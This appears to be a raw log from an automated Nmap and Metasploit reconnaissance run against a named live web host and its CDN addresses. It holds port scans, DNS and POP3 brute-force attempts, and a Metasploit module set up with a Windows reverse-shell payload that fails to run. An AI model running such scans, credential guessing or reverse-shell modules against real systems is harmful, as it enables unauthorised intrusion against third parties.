[*] guestmob.myspreadshop.com:23 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
[-] 151.101.66.137:23     - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.130.137:23    - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.194.137:23    - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.2.137:23      - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 4 of 8 hosts (50% complete)
[-] 2a04:4e42::649:23     - A network issue has occurred: The host ([2a04:4e42::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 5 of 8 hosts (62% complete)
[-] 2a04:4e42:200::649:23 - A network issue has occurred: The host ([2a04:4e42:200::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 6 of 8 hosts (75% complete)
[-] 2a04:4e42:400::649:23 - A network issue has occurred: The host ([2a04:4e42:400::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 7 of 8 hosts (87% complete)
[-] 2a04:4e42:600::649:23 - A network issue has occurred: The host ([2a04:4e42:600::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 53 opened... running tests...
====================================================================================•x[2022-02-21](14:28)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](14:28)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:28 EST
NSE: Loaded 64 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:28
Completed NSE at 14:28, 0.00s elapsed
Initiating NSE at 14:28
Completed NSE at 14:28, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:28
Completed Parallel DNS resolution of 1 host. at 14:28, 0.07s elapsed
Initiating SYN Stealth Scan at 14:28
Scanning guestmob.myspreadshop.com (151.101.194.137) [1 port]
Discovered open port 53/tcp on 151.101.194.137
Completed SYN Stealth Scan at 14:28, 0.08s elapsed (1 total ports)
Initiating Service scan at 14:28
Scanning 1 service on guestmob.myspreadshop.com (151.101.194.137)
Completed Service scan at 14:31, 158.62s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.194.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.194.137)
Initiating Traceroute at 14:31
Completed Traceroute at 14:31, 0.15s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:31
Completed Parallel DNS resolution of 1 host. at 14:31, 0.14s elapsed
NSE: Script scanning 151.101.194.137.
Initiating NSE at 14:31
Completed NSE at 14:31, 16.01s elapsed
Initiating NSE at 14:31
Completed NSE at 14:31, 1.11s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.194.137)
Host is up (0.10s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.2.137 151.101.66.137 151.101.130.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649

PORT   STATE SERVICE VERSION
53/tcp open  domain?
| dns-nsec-enum: 
|_  No NSEC records found
|_dns-fuzz: Server didn't response to our probe, can't fuzz
| dns-nsec3-enum: 
|_  DNSSEC NSEC3 not supported
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (88%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 4.816 days (since Wed Feb 16 18:57:10 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
| dns-brute: 
|_  DNS Brute-force hostnames: No results.
| dns-blacklist: 
|   PROXY
|     misc.dnsbl.sorbs.net - FAIL
|   SPAM
|     l2.apews.org - FAIL
|_    list.quorum.to - FAIL

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   146.98 ms 151.101.194.137

NSE: Script Post-scanning.
Initiating NSE at 14:31
Completed NSE at 14:31, 0.00s elapsed
Initiating NSE at 14:31
Completed NSE at 14:31, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 181.04 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 36 (2.284KB)
 + -- --=[Port 67 closed... skipping.
 + -- --=[Port 68 closed... skipping.
 + -- --=[Port 69 closed... skipping.
 + -- --=[Port 79 opened... running tests...
====================================================================================•x[2022-02-21](14:31)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](14:31)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:31 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:31
Completed NSE at 14:31, 0.00s elapsed
Initiating NSE at 14:31
Completed NSE at 14:31, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:31
Completed Parallel DNS resolution of 1 host. at 14:31, 0.08s elapsed
Initiating SYN Stealth Scan at 14:31
Scanning guestmob.myspreadshop.com (151.101.194.137) [1 port]
Discovered open port 79/tcp on 151.101.194.137
Completed SYN Stealth Scan at 14:31, 0.10s elapsed (1 total ports)
Initiating Service scan at 14:31
Scanning 1 service on guestmob.myspreadshop.com (151.101.194.137)
Completed Service scan at 14:34, 158.20s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.194.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.194.137)
Initiating Traceroute at 14:34
Completed Traceroute at 14:34, 0.15s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:34
Completed Parallel DNS resolution of 1 host. at 14:34, 0.08s elapsed
NSE: Script scanning 151.101.194.137.
Initiating NSE at 14:34
Completed NSE at 14:34, 10.63s elapsed
Initiating NSE at 14:34
Completed NSE at 14:34, 1.08s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.194.137)
Host is up (0.10s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.2.137 151.101.66.137 151.101.130.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649

PORT   STATE SERVICE VERSION
79/tcp open  finger?
|_finger: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 4.818 days (since Wed Feb 16 18:57:11 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 79/tcp)
HOP RTT       ADDRESS
1   143.52 ms 151.101.194.137

NSE: Script Post-scanning.
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.18 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 37 (2.382KB)
 + -- --=[Port 110 opened... running tests...
====================================================================================•x[2022-02-21](14:34)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](14:34)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:34 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Initiating Ping Scan at 14:34
Scanning guestmob.myspreadshop.com (151.101.2.137) [4 ports]
Completed Ping Scan at 14:34, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:34
Completed Parallel DNS resolution of 1 host. at 14:34, 0.07s elapsed
Initiating SYN Stealth Scan at 14:34
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 110/tcp on 151.101.2.137
Completed SYN Stealth Scan at 14:34, 0.09s elapsed (1 total ports)
Initiating Service scan at 14:34
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 14:37, 158.63s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 14:37
Completed Traceroute at 14:37, 0.13s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:37
Completed Parallel DNS resolution of 1 host. at 14:37, 0.06s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 14:37
Completed NSE at 14:37, 25.65s elapsed
Initiating NSE at 14:37
Completed NSE at 14:37, 1.07s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.093s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649

PORT    STATE SERVICE VERSION
110/tcp open  pop3?
| pop3-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 5 guesses in 26 seconds, average tps: 0.2
|_  ERROR: Failed to connect.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.835 days (since Thu Feb 10 18:35:31 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   124.82 ms 151.101.2.137

NSE: Script Post-scanning.
Initiating NSE at 14:37
Completed NSE at 14:37, 0.00s elapsed
Initiating NSE at 14:37
Completed NSE at 14:37, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.51 seconds
           Raw packets sent: 71 (6.520KB) | Rcvd: 37 (2.312KB)
 + -- --=[Port 111 opened... running tests...
====================================================================================•x[2022-02-21](14:37)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](14:37)x•
RHOSTS => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] guestmob.myspreadshop.com:111 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](14:38)x•
 RUNNING SHOW MOUNT 
====================================================================================•x[2022-02-21](14:38)x•
clnt_create: RPC: Unable to send
clnt_create: RPC: Unable to send
clnt_create: RPC: Unable to send
 + -- --=[Port 123 closed... skipping.
 + -- --=[Port 135 opened... running tests...
====================================================================================•x[2022-02-21](14:42)x•
 RUNNING RPCINFO 
====================================================================================•x[2022-02-21](14:42)x•
guestmob.myspreadshop.com: RPC: Unable to receive
====================================================================================•x[2022-02-21](14:42)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](14:42)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:42 EST
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:42
Completed NSE at 14:42, 0.00s elapsed
Initiating NSE at 14:42
Completed NSE at 14:42, 0.00s elapsed
Initiating Ping Scan at 14:42
Scanning guestmob.myspreadshop.com (151.101.130.137) [4 ports]
Completed Ping Scan at 14:42, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:42
Completed Parallel DNS resolution of 1 host. at 14:42, 0.26s elapsed
Initiating SYN Stealth Scan at 14:42
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 135/tcp on 151.101.130.137
Completed SYN Stealth Scan at 14:42, 0.13s elapsed (1 total ports)
Initiating Service scan at 14:42
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 14:45, 159.13s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 14:45
Completed Traceroute at 14:45, 0.16s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:45
Completed Parallel DNS resolution of 1 host. at 14:45, 0.10s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 14:45
Completed NSE at 14:45, 0.01s elapsed
Initiating NSE at 14:45
Completed NSE at 14:45, 1.11s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.12s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649

PORT    STATE SERVICE VERSION
135/tcp open  msrpc?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (90%), Linux 5.0 (89%), Linux 5.0 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.3 (88%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.489 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   162.56 ms 151.101.130.137

NSE: Script Post-scanning.
Initiating NSE at 14:45
Completed NSE at 14:45, 0.00s elapsed
Initiating NSE at 14:45
Completed NSE at 14:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.33 seconds
           Raw packets sent: 77 (7.498KB) | Rcvd: 42 (3.128KB)
====================================================================================•x[2022-02-21](14:45)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](14:45)x•
[*] Using configured payload windows/shell/reverse_tcp
RHOST => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
 + -- --=[Port 137 closed... skipping.
 + -- --=[Port 139 closed... skipping.
 + -- --=[Port 161 closed... skipping.
 + -- --=[Port 162 opened... running tests...
====================================================================================•x[2022-02-21](14:45)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](14:45)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:45 EST
NSE: Loaded 56 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:45
Completed NSE at 14:45, 0.00s elapsed
Initiating NSE at 14:45
Completed NSE at 14:45, 0.00s elapsed
Initiating Ping Scan at 14:45
Scanning guestmob.myspreadshop.com (151.101.2.137) [4 ports]
Completed Ping Scan at 14:45, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:45
Completed Parallel DNS resolution of 1 host. at 14:45, 0.08s elapsed
Initiating UDP Scan at 14:45
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Completed UDP Scan at 14:45, 0.92s elapsed (1 total ports)
Initiating Connect Scan at 14:45
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 162/tcp on 151.101.2.137
Completed Connect Scan at 14:45, 0.08s elapsed (1 total ports)
Initiating Service scan at 14:45
Scanning 2 services on guestmob.myspreadshop.com (151.101.2.137)
Service scan Timing: About 50.00% done; ETC: 14:48 (0:01:38 remaining)
Completed Service scan at 14:48, 160.01s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 14:48
Completed Traceroute at 14:48, 2.13s elapsed
Initiating Parallel DNS resolution of 8 hosts. at 14:48
Completed Parallel DNS resolution of 8 hosts. at 14:48, 0.51s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 14:48
Completed NSE at 14:48, 0.02s elapsed
Initiating NSE at 14:48
Completed NSE at 14:48, 1.14s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.11s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649

PORT    STATE         SERVICE   VERSION
162/tcp open          snmptrap?
162/udp open|filtered snmptrap
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 (88%), Linux 5.0 - 5.3 (88%), Linux 5.0 - 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 7.190 days (since Mon Feb 14 10:15:00 2022)
Network Distance: 8 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   85.01 ms  10.83.0.1
2   130.04 ms vlan184.as16.lax1.us.m247.com (45.89.173.193)
3   156.57 ms 217.138.223.96
4   153.32 ms te-3-1-0.bb1.lax1.us.m247.com (82.102.29.112)
5   153.38 ms las-b21-link.ip.twelve99.net (195.12.254.138)
6   119.10 ms las-b23-link.ip.twelve99.net (62.115.125.192)
7   119.05 ms fastly-svc071911-ic358827.ip.twelve99-cust.net (62.115.164.181)
8   119.01 ms 151.101.2.137

NSE: Script Post-scanning.
Initiating NSE at 14:48
Completed NSE at 14:48, 0.00s elapsed
Initiating NSE at 14:48
Completed NSE at 14:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.76 seconds
           Raw packets sent: 93 (7.882KB) | Rcvd: 46 (3.642KB)
====================================================================================•x[2022-02-21](14:48)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](14:48)x•
RHOSTS => guestmob.myspreadshop.com
[-] 151.101.66.137 SNMP request timeout.
[*] Scanned 1 of 8 hosts (12% complete)
[-] 151.101.130.137 SNMP request timeout.
[*] Scanned 2 of 8 hosts (25% complete)
[-] 151.101.194.137 SNMP request timeout.
[*] Scanned 3 of 8 hosts (37% complete)
[-] 151.101.2.137 SNMP request timeout.
[*] Scanned 4 of 8 hosts (50% complete)
[-] 2a04:4e42::649 Connection refused.
[*] Scanned 5 of 8 hosts (62% complete)
[-] 2a04:4e42:200::649 Connection refused.
[*] Scanned 6 of 8 hosts (75% complete)
[-] 2a04:4e42:400::649 Connection refused.
[*] Scanned 7 of 8 hosts (87% complete)
[-] 2a04:4e42:600::649 Connection refused.
[*] Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 264 opened... running tests...
====================================================================================•x[2022-02-21](14:48)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](14:48)x•
RHOSTS => guestmob.myspreadshop.com
[*] Running module against 151.101.2.137
[*] 151.101.2.137:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 151.101.2.137:264 - Unexpected response: 'nil'
[*] Running module against 151.101.66.137
[*] 151.101.66.137:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 151.101.66.137:264 - Unexpected response: 'nil'
[*] Running module against 151.101.130.137
[*] 151.101.130.137:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 151.101.130.137:264 - Unexpected response: 'nil'
[*] Running module against 151.101.194.137
[*] 151.101.194.137:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 151.101.194.137:264 - Unexpected response: 'nil'
[*] Running module against 2a04:4e42::649
[*] 2a04:4e42::649:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 2a04:4e42::649:264 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42::649]:264) was unreachable.
[-] 2a04:4e42::649:264 - Call stack:
[-] 2a04:4e42::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42::649:264 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42::649:264 -   /usr/share/metasploit-framework/modules/auxiliary/gather/checkpoint_hostname.rb:49:in `run'
[*] Running module against 2a04:4e42:200::649
[*] 2a04:4e42:200::649:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 2a04:4e42:200::649:264 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:200::649]:264) was unreachable.
[-] 2a04:4e42:200::649:264 - Call stack:
[-] 2a04:4e42:200::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:200::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:200::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:200::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:200::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:200::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:200::649:264 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:200::649:264 -   /usr/share/metasploit-framework/modules/auxiliary/gather/checkpoint_hostname.rb:49:in `run'
[*] Running module against 2a04:4e42:400::649
[*] 2a04:4e42:400::649:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 2a04:4e42:400::649:264 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:400::649]:264) was unreachable.
[-] 2a04:4e42:400::649:264 - Call stack:
[-] 2a04:4e42:400::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:400::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:400::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:400::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:400::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:400::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:400::649:264 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:400::649:264 -   /usr/share/metasploit-framework/modules/auxiliary/gather/checkpoint_hostname.rb:49:in `run'
[*] Running module against 2a04:4e42:600::649
[*] 2a04:4e42:600::649:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 2a04:4e42:600::649:264 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:600::649]:264) was unreachable.
[-] 2a04:4e42:600::649:264 - Call stack:
[-] 2a04:4e42:600::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:600::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:600::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:600::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:600::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:600::649:264 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:600::649:264 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:600::649:264 -   /usr/share/metasploit-framework/modules/auxiliary/gather/checkpoint_hostname.rb:49:in `run'
[*] Auxiliary module execution completed
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 445 closed... skipping.
 + -- --=[Port 500 closed... skipping.
 + -- --=[Port 512 opened... running tests...
====================================================================================•x[2022-02-21](14:49)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](14:49)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:49 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:49
Completed Parallel DNS resolution of 1 host. at 14:49, 0.09s elapsed
Initiating SYN Stealth Scan at 14:49
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 512/tcp on 151.101.2.137
